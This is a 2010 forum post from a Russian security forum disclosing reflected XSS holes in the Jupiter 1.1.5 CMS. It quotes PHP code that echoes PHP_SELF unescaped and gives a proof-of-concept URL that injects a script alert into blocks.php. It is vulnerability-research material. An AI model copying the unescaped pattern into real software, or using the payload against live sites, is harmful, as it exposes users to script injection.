18.03.2010, 04:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Jupiter 1.1.5
http://www.jupiterportal.org
passive xss
было скачано с http://www.cmsdownload.com/index.php?name=Downloads&get=99&mirror=132
PHP код:
...error_reporting (E_ALL);
$PHP_SELF = $_SERVER['PHP_SELF'];...
PHP код:
...<tr><td class="con1" valign="top"><a href="<?= $PHP_SELF ?>?a=logout"> » <?= $language ?></a></td></tr>...
PHP код:
...if(!isset($is_loged_in))
{
?>
<tr class='bottom' height='1%'><td valign='top'><?= $language['Maintance title2'] ?></td></tr><tr><td class='con2'><?= messagedef($language['Header message']) ?></td></tr>
<tr><td class='con1' height='96%' valign='top'>
<form method='post' action='<?= $PHP_SELF ?>?n=modules/login'>...
PHP код:
...<table width='100%' cellspacing='1' border='0' cellpadding='2'>
<tr><td class='empty' width='35%' valign='top'><a href='<?= $PHP_SELF ?>?n=modules/login&a=1'> » <?= $language['Maintance desc6'] ?></a></td>
<td class='con1' width='5%'> </td>...
PHP код:
...if(file_exists("$n.php"))
{
if(strpos($n, "../") !== false) header("location: $PHP_SELF?i=error");
else include("$n.php");
}
elseif(!file_exists("$n.php")) header("location: $PHP_SELF?i=error");...
Result:
http://localhost/jupiter/index.php[XSS]
passive xss
modules/block.php
PHP код:
...if(!isset($is_webmaster))
{ header("location: $PHP_SELF?i=2"); exit; }...
Result:http://localhost/jupiter/modules/blocks.php[XSS]
http://localhost/jupiter/modules/blocks.php%3Cscript%3Ealert(123)%3C/script%3E
В скриптах есть еще много XSS=/
Последний раз редактировалось Strilo4ka; 18.03.2010 в 04:57..
|
|
|